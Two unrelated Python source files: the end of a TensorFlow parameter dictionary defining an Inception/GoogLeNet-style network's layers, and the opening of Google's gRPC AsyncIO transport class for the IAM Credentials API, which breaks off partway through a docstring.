'conv3_kernel': tf.Variable(tf.truncated_normal(shape=[3, 3, 192, 192], stddev=1e-4, dtype=tf.float32)),
'conv3_strides': 1, 'conv3_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'conv3_name': 'conv3', 'conv3_padding': 'SAME',
'norm2_depth_radius': 2.5,
'norm2_bias': 2.0, 'norm2_alpha': 1e-4, 'norm2_beta': 0.75, 'norm2_name': 'local_resp_norm2',
'inception1_name': 'inception1',
'inception1_concat_axis': 3,
'inception1_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception1_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 64], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch1_conv1_name': 'inception1_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 96], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch2_conv1_name': 'inception1_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 96, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv2_name': 'inception1_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 16], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[16], dtype=tf.float32)),
'patch3_conv1_name': 'inception1_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 16, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv2_name': 'inception1_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception1_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 192, 32], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch4_conv1_name': 'inception1_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception2_name': 'inception2',
'inception2_concat_axis': 3,
'inception2_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception2_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 128], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch1_conv1_name': 'inception2_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv1_name': 'inception2_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 128, 192], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch2_conv2_name': 'inception2_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception2_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 96], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch3_conv2_name': 'inception2_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception2_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 256, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception2_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception3_name': 'inception3',
'inception3_concat_axis': 3,
'inception3_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception3_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 192], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch1_conv1_name': 'inception3_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 96], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[96], dtype=tf.float32)),
'patch2_conv1_name': 'inception3_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 96, 208], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[208], dtype=tf.float32)),
'patch2_conv2_name': 'inception3_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 16], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[16], dtype=tf.float32)),
'patch3_conv1_name': 'inception3_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 16, 48], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[48], dtype=tf.float32)),
'patch3_conv2_name': 'inception3_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception3_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 480, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception3_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception4_name': 'inception4',
'inception4_concat_axis': 3,
'inception4_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception4_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 160], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch1_conv1_name': 'inception4_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 112], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[112], dtype=tf.float32)),
'patch2_conv1_name': 'inception4_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 112, 224], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[224], dtype=tf.float32)),
'patch2_conv2_name': 'inception4_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 24], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[24], dtype=tf.float32)),
'patch3_conv1_name': 'inception4_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 24, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception4_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception4_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception4_patch4_conv2', 'patch4_conv1_padding': 'SAME',
'patch5_avage1_kernel': 5,
'patch5_avage1_strides': 3, 'patch5_avage1_name': 'inception4_patch5_avage1',
'patch5_avage1_padding': 'VALID',
'patch5_conv_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 328], stddev=1e-4, dtype=tf.float32)),
'patch5_conv_strides': 1,
'patch5_conv_biases': tf.Variable(tf.constant(0.0, shape=[328], dtype=tf.float32)),
'patch5_conv_name': 'inception4_patch5_conv1', 'patch5_conv_padding': 'SAME',
'patch5_fc1_weights':
tf.Variable(tf.truncated_normal(shape=[328, 1024], stddev=1e-1, dtype=tf.float32)),
'patch5_fc1_biases': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc1_name': 'inception4_patch5_fc1', 'patch5_fc1_relu': True,
'patch5_fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc2_weights':
tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'patch5_fc2_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'patch5_fc2_name': 'inception4_patch5_fc2', 'patch5_fc2_relu': True,
'patch5_fc2_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
},
'inception5_name': 'inception5',
'inception5_concat_axis': 3,
'inception5_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception5_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 128], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch1_conv1_name': 'inception5_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 128], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch2_conv1_name': 'inception5_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 128, 256], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch2_conv2_name': 'inception5_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 24], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[24], dtype=tf.float32)),
'patch3_conv1_name': 'inception5_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 24, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception5_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception5_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception5_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception6_name': 'inception6',
'inception6_concat_axis': 3,
'inception6_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception6_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 112], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[112], dtype=tf.float32)),
'patch1_conv1_name': 'inception6_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 144], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[144], dtype=tf.float32)),
'patch2_conv1_name': 'inception6_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 144, 288], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[288], dtype=tf.float32)),
'patch2_conv2_name': 'inception6_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception6_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 64], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch3_conv2_name': 'inception6_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception6_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 512, 64], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[64], dtype=tf.float32)),
'patch4_conv1_name': 'inception6_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception7_name': 'inception7',
'inception7_concat_axis': 3,
'inception7_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception7_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 256], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch1_conv1_name': 'inception7_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 160], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch2_conv1_name': 'inception7_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 160, 320], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[320], dtype=tf.float32)),
'patch2_conv2_name': 'inception7_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception7_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception7_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception7_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception7_patch4_conv2', 'patch4_conv1_padding': 'SAME',
'patch5_avage1_kernel': 5,
'patch5_avage1_strides': 3, 'patch5_avage1_name': 'inception7_patch5_avage1',
'patch5_avage1_padding': 'VALID',
'patch5_conv_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 528, 328], stddev=1e-4, dtype=tf.float32)),
'patch5_conv_strides': 1,
'patch5_conv_biases': tf.Variable(tf.constant(0.0, shape=[328], dtype=tf.float32)),
'patch5_conv_name': 'inception7_patch5_conv1', 'patch5_conv_padding': 'SAME',
'patch5_fc1_weights':
tf.Variable(tf.truncated_normal(shape=[328, 1024], stddev=1e-1, dtype=tf.float32)),
'patch5_fc1_biases': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc1_name': 'inception7_patch5_fc1', 'patch5_fc1_relu': True,
'patch5_fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[1024], dtype=tf.float32)),
'patch5_fc2_weights':
tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'patch5_fc2_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'patch5_fc2_name': 'inception7_patch5_fc2', 'patch5_fc2_relu': True,
'patch5_fc2_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
},
'inception8_name': 'inception8',
'inception8_concat_axis': 3,
'inception8_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception8_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 256], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[256], dtype=tf.float32)),
'patch1_conv1_name': 'inception8_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 160], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[160], dtype=tf.float32)),
'patch2_conv1_name': 'inception8_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 160, 320], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[320], dtype=tf.float32)),
'patch2_conv2_name': 'inception8_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 32], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[32], dtype=tf.float32)),
'patch3_conv1_name': 'inception8_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 32, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception8_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception8_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception8_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'inception9_name': 'inception9',
'inception9_concat_axis': 3,
'inception9_param': {
'max1_ksize': 3, 'max1_strides': 2, 'max1_name': 'inception9_max1', 'max1_padding': 'SAME',
'patch1_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 384], stddev=1e-4, dtype=tf.float32)),
'patch1_conv1_strides': 1,
'patch1_conv1_biases': tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32)),
'patch1_conv1_name': 'inception9_patch1_conv1', 'patch1_conv1_padding': 'SAME',
'patch2_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 192], stddev=1e-4, dtype=tf.float32)),
'patch2_conv1_strides': 1,
'patch2_conv1_biases': tf.Variable(tf.constant(0.0, shape=[192], dtype=tf.float32)),
'patch2_conv1_name': 'inception9_patch2_conv1', 'patch2_conv1_padding': 'SAME',
'patch2_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[3, 3, 192, 384], stddev=1e-4, dtype=tf.float32)),
'patch2_conv2_strides': 1,
'patch2_conv2_biases': tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32)),
'patch2_conv2_name': 'inception9_patch2_conv2', 'patch2_conv2_padding': 'SAME',
'patch3_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 48], stddev=1e-4, dtype=tf.float32)),
'patch3_conv1_strides': 1,
'patch3_conv1_biases': tf.Variable(tf.constant(0.0, shape=[48], dtype=tf.float32)),
'patch3_conv1_name': 'inception9_patch3_conv1', 'patch3_conv1_padding': 'SAME',
'patch3_conv2_kernel':
tf.Variable(tf.truncated_normal(shape=[5, 5, 48, 128], stddev=1e-4, dtype=tf.float32)),
'patch3_conv2_strides': 1,
'patch3_conv2_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch3_conv2_name': 'inception9_patch3_conv2', 'patch3_conv2_padding': 'SAME',
'patch4_max1_kernel': 3,
'patch4_max1_strides': 1, 'patch4_max1_name': 'inception9_patch4_max1',
'patch4_max1_padding': 'SAME',
'patch4_conv1_kernel':
tf.Variable(tf.truncated_normal(shape=[1, 1, 832, 128], stddev=1e-4, dtype=tf.float32)),
'patch4_conv1_strides': 1,
'patch4_conv1_biases': tf.Variable(tf.constant(0.0, shape=[128], dtype=tf.float32)),
'patch4_conv1_name': 'inception9_patch4_conv2', 'patch4_conv1_padding': 'SAME'
},
'avage1_ksize': 7, 'avage1_strides': 1, 'avage1_name': 'avage1', 'avage1_padding': 'SAME',
'fc1_weights': tf.Variable(tf.truncated_normal(shape=[1024, number_classes], stddev=1e-1, dtype=tf.float32)),
'fc1_biases': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32)),
'fc1_name': 'fc1', 'fc1_relu': True,
'fc1_relu_bias': tf.Variable(tf.constant(1.0, shape=[number_classes], dtype=tf.float32))
}
return model_param
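# Hedged sketch (not part of this file): one way a model builder might
# consume the 'convN_*' entries above; _build_conv_sketch is an illustrative
# name, not an assumption about the real consumer.
def _build_conv_sketch(x, p, prefix):
    strides = p[prefix + '_strides']
    conv = tf.nn.conv2d(x, p[prefix + '_kernel'],
                        strides=[1, strides, strides, 1],
                        padding=p[prefix + '_padding'],
                        name=p[prefix + '_name'])
    return tf.nn.relu(tf.nn.bias_add(conv, p[prefix + '_biases']))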
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.iam.credentials_v1.types import common
from .base import IAMCredentialsTransport, DEFAULT_CLIENT_INFO
from .grpc import IAMCredentialsGrpcTransport
class IAMCredentialsGrpcAsyncIOTransport(IAMCredentialsTransport):
"""gRPC AsyncIO backend transport for IAMCredentials.
A service account is a special type of Google account that
belongs to your application or a virtual machine (VM), instead
of to an individual end user. Your application assumes the
identity of the service account to call Google APIs, so that the
users aren't directly involved.
Service account credentials are used to temporarily assume the
identity of the service account. Supported credential types
include OAuth 2.0 access tokens, OpenID Connect ID tokens,
self-signed JSON Web Tokens (JWTs), and more.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'iamcredentials.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'iamcredentials.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
